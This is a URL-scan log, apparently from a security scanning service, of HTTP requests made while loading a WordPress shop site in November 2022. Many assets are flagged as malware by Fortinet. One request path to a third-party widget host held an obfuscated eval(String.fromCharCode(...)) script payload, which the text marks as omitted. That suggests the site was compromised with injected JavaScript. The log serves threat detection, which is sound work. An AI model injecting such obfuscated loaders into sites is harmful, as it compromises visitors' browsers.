35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/click-to-chat-for-whatsapp/assets/js/app.js?ver=1.6
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/click-to-chat-for-whatsapp/assets/js/app.js?ver=1.6 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Wed, 14 Nov 2018 13:21:36 GMT
etag: W/"5bec2160-c27"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
static.zotabox.com/[percent-encoded eval(String.fromCharCode(...)) script payload omitted]/widgets.js
104.22.54.216 404 Not Found 0 B URL HTTP/2
IP 104.22.54.216:0
GET /[percent-encoded eval(String.fromCharCode(...)) script payload omitted]/widgets.js HTTP/1.1
Host: static.zotabox.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 404 Not Found
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/html; charset=utf-8
vary: Accept-Encoding
x-powered-by: Zotabox
access-control-allow-origin: *
access-control-allow-methods: GET,POST
content-security-policy: default-src 'none'
x-content-type-options: nosniff
content-encoding: gzip
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 76fa3b9ea811b4f1-OSL
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/bb-plugin/cache/1735-layout.css?ver=f0a77558ad3f599b1fa355fe811a730e
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/uploads/bb-plugin/cache/1735-layout.css?ver=f0a77558ad3f599b1fa355fe811a730e
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/uploads/bb-plugin/cache/1735-layout.css?ver=f0a77558ad3f599b1fa355fe811a730e HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Mon, 07 Nov 2022 16:42:37 GMT
etag: W/"6369357d-37163"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/themes/jupiter/assets/stylesheet/plugins/min/woocommerce.css?ver=6.0.3
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/assets/stylesheet/plugins/min/woocommerce.css?ver=6.0.3
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/jupiter/assets/stylesheet/plugins/min/woocommerce.css?ver=6.0.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:03 GMT
etag: W/"5c20120b-d7de"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/themes/jupiter/assets/stylesheet/min/full-styles.6.1.5.css?ver=1545605643
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/assets/stylesheet/min/full-styles.6.1.5.css?ver=1545605643
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/jupiter/assets/stylesheet/min/full-styles.6.1.5.css?ver=1545605643 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:03 GMT
etag: W/"5c20120b-83daf"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
stats.wp.com/s-202247.js
192.0.76.3 200 OK 0 B IP 192.0.76.3:0
GET /s-202247.js HTTP/1.1
Host: stats.wp.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding
etag: W/"6197c5cf-2494"
content-encoding: br
expires: Mon, 20 Nov 2023 12:08:34 GMT
cache-control: max-age=31536000
x-nc: HIT arn
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/bb-ultimate-addon/assets/css/uabb-animate.css
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/bb-ultimate-addon/assets/css/uabb-animate.css
IP 35.190.203.220:0
GET /wp-content/plugins/bb-ultimate-addon/assets/css/uabb-animate.css HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sat, 01 Dec 2018 21:30:58 GMT
etag: W/"5c02fd92-1274f"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/mk_assets/theme-options-production-1667829365.css?ver=1667829082
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/uploads/mk_assets/theme-options-production-1667829365.css?ver=1667829082
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/uploads/mk_assets/theme-options-production-1667829365.css?ver=1667829082 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Mon, 07 Nov 2022 13:56:05 GMT
etag: W/"63690e75-9b55"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/bb-plugin/cache/1735-layout.js?ver=f0a77558ad3f599b1fa355fe811a730e
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/uploads/bb-plugin/cache/1735-layout.js?ver=f0a77558ad3f599b1fa355fe811a730e
IP 35.190.203.220:0
GET /wp-content/uploads/bb-plugin/cache/1735-layout.js?ver=f0a77558ad3f599b1fa355fe811a730e HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Mon, 07 Nov 2022 16:42:37 GMT
etag: W/"6369357d-be16"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.6.4
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.6.4
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.6.4 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Thu, 27 Oct 2022 10:18:20 GMT
etag: W/"635a5aec-3016"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/bb-plugin/icons/ultimate-icons/style.css?ver=2.2.6.3
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/uploads/bb-plugin/icons/ultimate-icons/style.css?ver=2.2.6.3
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/uploads/bb-plugin/icons/ultimate-icons/style.css?ver=2.2.6.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:01:59 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sat, 01 Dec 2018 21:38:27 GMT
etag: W/"5c02ff53-54a3"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/themes/jupiter/header-builder/includes/assets/css/mkhb-row.css?ver=6.1.5
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/header-builder/includes/assets/css/mkhb-row.css?ver=6.1.5
IP 35.190.203.220:0
GET /wp-content/themes/jupiter/header-builder/includes/assets/css/mkhb-row.css?ver=6.1.5 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:03 GMT
etag: W/"5c20120b-73f"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
IP 35.190.203.220:0
GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Wed, 18 Nov 2020 09:06:06 GMT
etag: W/"5fb4e3fe-2bd8"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/themes/jupiter/header-builder/includes/assets/js/mkhb-column.js?ver=6.1.5
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/header-builder/includes/assets/js/mkhb-column.js?ver=6.1.5
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/jupiter/header-builder/includes/assets/js/mkhb-column.js?ver=6.1.5 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:03 GMT
etag: W/"5c20120b-cdd"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
fonts.googleapis.com/css?family=Lato%3A700%2C400%2C700i%2C900&ver=6.0.3
142.250.74.10 200 OK 0 B URL HTTP/2 fonts.googleapis.com/css?family=Lato%3A700%2C400%2C700i%2C900&ver=6.0.3
IP 142.250.74.10:0
GET /css?family=Lato%3A700%2C400%2C700i%2C900&ver=6.0.3 HTTP/1.1
Host: fonts.googleapis.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/css; charset=utf-8
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Fri, 25 Nov 2022 12:02:00 GMT
date: Fri, 25 Nov 2022 12:02:00 GMT
cache-control: private, max-age=86400
cross-origin-opener-policy: same-origin-allow-popups
cross-origin-resource-policy: cross-origin
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
stats.wp.com/e-202247.js
192.0.76.3 200 OK 0 B IP 192.0.76.3:0
GET /e-202247.js HTTP/1.1
Host: stats.wp.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding
etag: W/"6197c5cf-3508"
content-encoding: br
expires: Mon, 13 Nov 2023 09:17:34 GMT
cache-control: max-age=31536000
access-control-allow-methods: GET, HEAD
access-control-allow-origin: *
x-nc: HIT arn
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/themes/jupiter/framework/includes/woocommerce-quantity-increment/assets/js/wc-quantity-increment.min.js?ver=6.0.3
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/framework/includes/woocommerce-quantity-increment/assets/js/wc-quantity-increment.min.js?ver=6.0.3
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/jupiter/framework/includes/woocommerce-quantity-increment/assets/js/wc-quantity-increment.min.js?ver=6.0.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:02 GMT
etag: W/"5c20120a-59c"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.6.7
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.6.7
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.6.7 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Fri, 11 Mar 2022 00:15:40 GMT
etag: W/"622a94ac-b7c"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.0 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Wed, 10 Mar 2021 15:07:24 GMT
etag: W/"6048e0ac-15db1"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/?wc-ajax=get_refreshed_fragments
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/?wc-ajax=get_refreshed_fragments
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
POST /?wc-ajax=get_refreshed_fragments HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 18
Origin: https://emirates4yu.com
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Cookie: tk_or=%22%22; tk_r3d=%22%22; tk_lr=%22%22; pll_language=fr
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:03 GMT
content-type: application/json; charset=UTF-8
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding
access-control-allow-origin: https://emirates4yu.com
access-control-allow-credentials: true
x-content-type-options: nosniff
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-transform, no-cache, must-revalidate, max-age=0
x-robots-tag: noindex
x-powered-by: WP Engine
content-encoding: gzip
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/akismet/_inc/akismet-frontend.js?ver=1664410082
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/akismet/_inc/akismet-frontend.js?ver=1664410082
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/akismet/_inc/akismet-frontend.js?ver=1664410082 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Thu, 29 Sep 2022 00:08:02 GMT
etag: W/"6334e1e2-29ed"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/click-to-chat-for-whatsapp/assets/css/mainstyles.css?ver=1.6
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/click-to-chat-for-whatsapp/assets/css/mainstyles.css?ver=1.6
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/click-to-chat-for-whatsapp/assets/css/mainstyles.css?ver=1.6 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Wed, 14 Nov 2018 13:21:36 GMT
etag: W/"5bec2160-1021"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/themes/jupiter/framework/includes/woocommerce-quantity-increment/assets/js/lib/number-polyfill.min.js?ver=6.0.3
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/framework/includes/woocommerce-quantity-increment/assets/js/lib/number-polyfill.min.js?ver=6.0.3
IP 35.190.203.220:0
GET /wp-content/themes/jupiter/framework/includes/woocommerce-quantity-increment/assets/js/lib/number-polyfill.min.js?ver=6.0.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:02 GMT
etag: W/"5c20120a-2268"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Fri, 11 Mar 2022 00:15:40 GMT
etag: W/"622a94ac-255e"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-form-move-tracker.js?ver=1.9
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-form-move-tracker.js?ver=1.9
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-form-move-tracker.js?ver=1.9 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Tue, 25 Dec 2018 21:49:33 GMT
etag: W/"5c22a5ed-5cf"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
